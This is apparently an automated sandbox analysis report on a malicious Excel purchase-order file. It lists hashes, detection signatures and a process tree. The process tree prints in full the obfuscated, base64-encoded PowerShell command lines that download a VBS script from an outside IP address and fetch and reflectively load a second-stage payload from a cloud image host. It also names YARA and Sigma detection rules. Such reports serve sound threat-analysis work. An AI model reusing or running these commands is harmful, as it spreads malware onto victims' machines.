Edit tour
Windows
Analysis Report
NB PO-104105107108.xls
Overview
General Information
| Sample name: | NB PO-104105107108.xls |
| Analysis ID: | 1574858 |
| MD5: | ac8e858040a8cead91ef441f86c9cb40 |
| SHA1: | cfa17e7609799a0b1ecc49e2d542bc159af20f7a |
| SHA256: | 1272130e96664e18dfff89fc4e6017c3bbf17090f304df2b3a9c7f604b7ad54a |
| Tags: | xlsuser-abuse_ch |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected obfuscated html page
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 3288 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
mshta.exe (PID: 3580 cmdline: C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) 
cmd.exe (PID: 3712 cmdline: "C:\Window s\system32 \cmd.exe" "/C pOWERS heLL -eX byPASS -nop -W 1 -C deViCeCRE dENTIALdep loymEnt ; iNVOkE-E xpRESsIOn( $(iNvOke-e xprEsSION( '[sYsteM.T EXt.eNcODI NG]'+[Char ]58+[cHaR] 58+'UTf8.g Etstring([ SySTEm.con VErt]'+[Ch AR]58+[Cha r]0X3A+'Fr ombAsE64ST riNg('+[ch Ar]34+'JDR JRjZKICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI D0gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgYWR kLXRZcGUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW1lTUJ FckRFRklOS XRJT04gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gJ1tEbGxJb XBvcnQoIlV SbG1PTiIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9 hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgWmJQZ 0Z0LHN0cml uZyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBqW CxzdHJpbmc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgbFd1W HlFSFUsdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBBY nQsSW50UHR yICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHBUQ ncpOycgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLU5hbWUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgInVVUyI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLU5BT WVTUEFjZSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBjUCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtUGFzc1R ocnU7ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CQ0SUY2Sjo 6VVJMRG93b mxvYWRUb0Z pbGUoMCwia HR0cDovLzI zLjk1LjIzN S4yOS8xMTg vZnJlZXNpe mVkcmVzc2Z vcm5hdHVyY WxiZWF1dHl pbnRoaXNjY XNlZm9yeW9 1Z29vZC50S UYiLCIkRU5 WOkFQUERBV EFcZnJlZXN pemVkcmVzc 2Zvcm5hdHV yYWxiZWF1d HlpbnRoaXN jYXNlZm9ye W91LnZiUyI sMCwwKTtzd EFyVC1zbGV FcCgzKTtpb nZvS0UtZXh wckVTU2lvT iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAiJGV udjpBUFBEQ VRBXGZyZWV zaXplZHJlc 3Nmb3JuYXR 1cmFsYmVhd XR5aW50aGl zY2FzZWZvc nlvdS52YlM i'+[CHar]3 4+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) 
powershell.exe (PID: 3736 cmdline: pOWERSheLL -e X by PASS -nop -W 1 - C de ViCeCREdEN TIALdeploy mEnt ; i NVOkE-ExpR ESsIOn($(i NvOke-expr EsSION('[s YsteM.TEXt .eNcODING] '+[Char]58 +[cHaR]58+ 'UTf8.gEts tring([SyS TEm.conVEr t]'+[ChAR] 58+[Char]0 X3A+'Fromb AsE64STriN g('+[chAr] 34+'JDRJRj ZKICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgID0g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgYWRkLX RZcGUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW1lTUJFck RFRklOSXRJ T04gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgJ1 tEbGxJbXBv cnQoIlVSbG 1PTiIsICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IENoYXJTZX QgPSBDaGFy U2V0LlVuaW NvZGUpXXB1 YmxpYyBzdG F0aWMgZXh0 ZXJuIEludF B0ciBVUkxE b3dubG9hZF RvRmlsZShJ bnRQdHIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgWmJQZ0Z0 LHN0cmluZy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBqWCxz dHJpbmcgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbFd1WHlF SFUsdWludC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBBYnQs SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIHBUQncp OycgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLU 5hbWUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg InVVUyIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLU5BTWVT UEFjZSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BjUCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt UGFzc1Rocn U7ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICQ0 SUY2Sjo6VV JMRG93bmxv YWRUb0ZpbG UoMCwiaHR0 cDovLzIzLj k1LjIzNS4y OS8xMTgvZn JlZXNpemVk cmVzc2Zvcm 5hdHVyYWxi ZWF1dHlpbn RoaXNjYXNl Zm9yeW91Z2 9vZC50SUYi LCIkRU5WOk FQUERBVEFc ZnJlZXNpem VkcmVzc2Zv cm5hdHVyYW xiZWF1dHlp bnRoaXNjYX NlZm9yeW91 LnZiUyIsMC wwKTtzdEFy VC1zbGVFcC gzKTtpbnZv S0UtZXhwck VTU2lvTiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAiJGVudj pBUFBEQVRB XGZyZWVzaX plZHJlc3Nm b3JuYXR1cm FsYmVhdXR5 aW50aGlzY2 FzZWZvcnlv dS52YlMi'+ [CHar]34+' ))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) 
csc.exe (PID: 3896 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\1dk2y0 4d\1dk2y04 d.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3904 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESE734.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\1dk 2y04d\CSCA 659ECAEC35 54F2F90108 FC5834CA54 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) 
wscript.exe (PID: 3988 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\frees izedressfo rnaturalbe autyinthis caseforyou .vbS" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 4032 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $comicsver se = 'JGhl bGljb3Byb3 RlaWQgPSAn aHR0cHM6Ly 9yZXMuY2xv dWRpbmFyeS 5jb20vZHp2 YWk4NnVoL2 ltYWdlL3Vw bG9hZC92MT czNDA1MDk5 MS91bnhhb2 9peWt4Zm13 OXBhbjR6MS 5qcGcgJzsk bWV0YXBoeX RlID0gTmV3 LU9iamVjdC BTeXN0ZW0u TmV0LldlYk NsaWVudDsk Y2hvdWwgPS AkbWV0YXBo eXRlLkRvd2 5sb2FkRGF0 YSgkaGVsaW NvcHJvdGVp ZCk7JHBvb2 tvbyA9IFtT eXN0ZW0uVG V4dC5FbmNv ZGluZ106Ol VURjguR2V0 U3RyaW5nKC RjaG91bCk7 JHJhbmdpbm VzcyA9ICc8 PEJBU0U2NF 9TVEFSVD4+ JzskeGFudG hhbGluZSA9 ICc8PEJBU0 U2NF9FTkQ+ Pic7JFBpem Fycm8gPSAk cG9va29vLk luZGV4T2Yo JHJhbmdpbm Vzcyk7JGhh bmdlciA9IC Rwb29rb28u SW5kZXhPZi gkeGFudGhh bGluZSk7JF BpemFycm8g LWdlIDAgLW FuZCAkaGFu Z2VyIC1ndC AkUGl6YXJy bzskUGl6YX JybyArPSAk cmFuZ2luZX NzLkxlbmd0 aDskc3ludG F4aW4gPSAk aGFuZ2VyIC 0gJFBpemFy cm87JGluc2 FsdmVhYmxl ID0gJHBvb2 tvby5TdWJz dHJpbmcoJF BpemFycm8s ICRzeW50YX hpbik7JHVu Y2x1dHRlci A9IC1qb2lu ICgkaW5zYW x2ZWFibGUu VG9DaGFyQX JyYXkoKSB8 IEZvckVhY2 gtT2JqZWN0 IHsgJF8gfS lbLTEuLi0o JGluc2Fsdm VhYmxlLkxl bmd0aCldOy RjYXRhc3Ry b3BoZSA9IF tTeXN0ZW0u Q29udmVydF 06OkZyb21C YXNlNjRTdH JpbmcoJHVu Y2x1dHRlci k7JG5lcGhy b2kgPSBbU3 lzdGVtLlJl ZmxlY3Rpb2 4uQXNzZW1i bHldOjpMb2 FkKCRjYXRh c3Ryb3BoZS k7JGNvbnZl cmJzID0gW2 RubGliLklP LkhvbWVdLk dldE1ldGhv ZCgnVkFJJy k7JGNvbnZl cmJzLkludm 9rZSgkbnVs bCwgQCgnMC 9MV3pWcS9y L2VlLmV0c2 FwLy86c3B0 dGgnLCAnJG hhc3NsZWQn LCAnJGhhc3 NsZWQnLCAn JGhhc3NsZW QnLCAnQ2Fz UG9sJywgJy RoYXNzbGVk JywgJyRoYX NzbGVkJywn JGhhc3NsZW QnLCckaGFz c2xlZCcsJy RoYXNzbGVk JywnJGhhc3 NsZWQnLCck aGFzc2xlZC csJzEnLCck aGFzc2xlZC csJycpKTs= ';$eyeing = [System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring($com icsverse)) ;Invoke-Ex pression $ eyeing MD5: A575A7610E5F003CC36DF39E07C4BA7D) - mshta.exe (PID: 2772 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 3040 cmdline:
"C:\Window s\system32 \cmd.exe" "/C pOWERS heLL -eX byPASS -nop -W 1 -C deViCeCRE dENTIALdep loymEnt ; iNVOkE-E xpRESsIOn( $(iNvOke-e xprEsSION( '[sYsteM.T EXt.eNcODI NG]'+[Char ]58+[cHaR] 58+'UTf8.g Etstring([ SySTEm.con VErt]'+[Ch AR]58+[Cha r]0X3A+'Fr ombAsE64ST riNg('+[ch Ar]34+'JDR JRjZKICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI D0gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgYWR kLXRZcGUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW1lTUJ FckRFRklOS XRJT04gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gJ1tEbGxJb XBvcnQoIlV SbG1PTiIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9 hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgWmJQZ 0Z0LHN0cml uZyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBqW CxzdHJpbmc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgbFd1W HlFSFUsdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBBY nQsSW50UHR yICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHBUQ ncpOycgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLU5hbWUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgInVVUyI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLU5BT WVTUEFjZSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBjUCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtUGFzc1R ocnU7ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CQ0SUY2Sjo 6VVJMRG93b mxvYWRUb0Z pbGUoMCwia HR0cDovLzI zLjk1LjIzN S4yOS8xMTg vZnJlZXNpe mVkcmVzc2Z vcm5hdHVyY WxiZWF1dHl pbnRoaXNjY XNlZm9yeW9 1Z29vZC50S UYiLCIkRU5 WOkFQUERBV EFcZnJlZXN pemVkcmVzc 2Zvcm5hdHV yYWxiZWF1d HlpbnRoaXN jYXNlZm9ye W91LnZiUyI sMCwwKTtzd EFyVC1zbGV FcCgzKTtpb nZvS0UtZXh wckVTU2lvT iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAiJGV udjpBUFBEQ VRBXGZyZWV zaXplZHJlc 3Nmb3JuYXR 1cmFsYmVhd XR5aW50aGl zY2FzZWZvc nlvdS52YlM i'+[CHar]3 4+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 3068 cmdline:
pOWERSheLL -e X by PASS -nop -W 1 - C de ViCeCREdEN TIALdeploy mEnt ; i NVOkE-ExpR ESsIOn($(i NvOke-expr EsSION('[s YsteM.TEXt .eNcODING] '+[Char]58 +[cHaR]58+ 'UTf8.gEts tring([SyS TEm.conVEr t]'+[ChAR] 58+[Char]0 X3A+'Fromb AsE64STriN g('+[chAr] 34+'JDRJRj ZKICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgID0g ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgYWRkLX RZcGUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LW1lTUJFck RFRklOSXRJ T04gICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgJ1 tEbGxJbXBv cnQoIlVSbG 1PTiIsICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IENoYXJTZX QgPSBDaGFy U2V0LlVuaW NvZGUpXXB1 YmxpYyBzdG F0aWMgZXh0 ZXJuIEludF B0ciBVUkxE b3dubG9hZF RvRmlsZShJ bnRQdHIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgWmJQZ0Z0 LHN0cmluZy AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBqWCxz dHJpbmcgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgbFd1WHlF SFUsdWludC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBBYnQs SW50UHRyIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIHBUQncp OycgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLU 5hbWUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg InVVUyIgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgLU5BTWVT UEFjZSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC BjUCAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAt UGFzc1Rocn U7ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICQ0 SUY2Sjo6VV JMRG93bmxv YWRUb0ZpbG UoMCwiaHR0 cDovLzIzLj k1LjIzNS4y OS8xMTgvZn JlZXNpemVk cmVzc2Zvcm 5hdHVyYWxi ZWF1dHlpbn RoaXNjYXNl Zm9yeW91Z2 9vZC50SUYi LCIkRU5WOk FQUERBVEFc ZnJlZXNpem VkcmVzc2Zv cm5hdHVyYW xiZWF1dHlp bnRoaXNjYX NlZm9yeW91 LnZiUyIsMC wwKTtzdEFy VC1zbGVFcC gzKTtpbnZv S0UtZXhwck VTU2lvTiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAiJGVudj pBUFBEQVRB XGZyZWVzaX plZHJlc3Nm b3JuYXR1cm FsYmVhdXR5 aW50aGlzY2 FzZWZvcnlv dS52YlMi'+ [CHar]34+' ))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 2100 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\u10sol cd\u10solc d.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 2036 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES367B.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\u10 solcd\CSCB 37CF81CE43 34084B75C7 031C6A4882 F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 3276 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\frees izedressfo rnaturalbe autyinthis caseforyou .vbS" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 2648 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $comicsver se = 'JGhl bGljb3Byb3 RlaWQgPSAn aHR0cHM6Ly 9yZXMuY2xv dWRpbmFyeS 5jb20vZHp2 YWk4NnVoL2 ltYWdlL3Vw bG9hZC92MT czNDA1MDk5 MS91bnhhb2 9peWt4Zm13 OXBhbjR6MS 5qcGcgJzsk bWV0YXBoeX RlID0gTmV3 LU9iamVjdC BTeXN0ZW0u TmV0LldlYk NsaWVudDsk Y2hvdWwgPS AkbWV0YXBo eXRlLkRvd2 5sb2FkRGF0 YSgkaGVsaW NvcHJvdGVp ZCk7JHBvb2 tvbyA9IFtT eXN0ZW0uVG V4dC5FbmNv ZGluZ106Ol VURjguR2V0 U3RyaW5nKC RjaG91bCk7 JHJhbmdpbm VzcyA9ICc8 PEJBU0U2NF 9TVEFSVD4+ JzskeGFudG hhbGluZSA9 ICc8PEJBU0 U2NF9FTkQ+ Pic7JFBpem Fycm8gPSAk cG9va29vLk luZGV4T2Yo JHJhbmdpbm Vzcyk7JGhh bmdlciA9IC Rwb29rb28u SW5kZXhPZi gkeGFudGhh bGluZSk7JF BpemFycm8g LWdlIDAgLW FuZCAkaGFu Z2VyIC1ndC AkUGl6YXJy bzskUGl6YX JybyArPSAk cmFuZ2luZX NzLkxlbmd0 aDskc3ludG F4aW4gPSAk aGFuZ2VyIC 0gJFBpemFy cm87JGluc2 FsdmVhYmxl ID0gJHBvb2 tvby5TdWJz dHJpbmcoJF BpemFycm8s ICRzeW50YX hpbik7JHVu Y2x1dHRlci A9IC1qb2lu ICgkaW5zYW x2ZWFibGUu VG9DaGFyQX JyYXkoKSB8 IEZvckVhY2 gtT2JqZWN0 IHsgJF8gfS lbLTEuLi0o JGluc2Fsdm VhYmxlLkxl bmd0aCldOy RjYXRhc3Ry b3BoZSA9IF tTeXN0ZW0u Q29udmVydF 06OkZyb21C YXNlNjRTdH JpbmcoJHVu Y2x1dHRlci k7JG5lcGhy b2kgPSBbU3 lzdGVtLlJl ZmxlY3Rpb2 4uQXNzZW1i bHldOjpMb2 FkKCRjYXRh c3Ryb3BoZS k7JGNvbnZl cmJzID0gW2 RubGliLklP LkhvbWVdLk dldE1ldGhv ZCgnVkFJJy k7JGNvbnZl cmJzLkludm 9rZSgkbnVs bCwgQCgnMC 9MV3pWcS9y L2VlLmV0c2 FwLy86c3B0 dGgnLCAnJG hhc3NsZWQn LCAnJGhhc3 NsZWQnLCAn JGhhc3NsZW QnLCAnQ2Fz UG9sJywgJy RoYXNzbGVk JywgJyRoYX NzbGVkJywn JGhhc3NsZW QnLCckaGFz c2xlZCcsJy RoYXNzbGVk JywnJGhhc3 NsZWQnLCck aGFzc2xlZC csJzEnLCck aGFzc2xlZC csJycpKTs= ';$eyeing = [System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring($com icsverse)) ;Invoke-Ex pression $ eyeing MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||